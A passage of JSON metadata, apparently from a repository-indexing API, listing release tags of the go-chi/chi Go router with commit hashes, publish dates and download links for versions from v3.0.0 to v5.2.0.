fef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G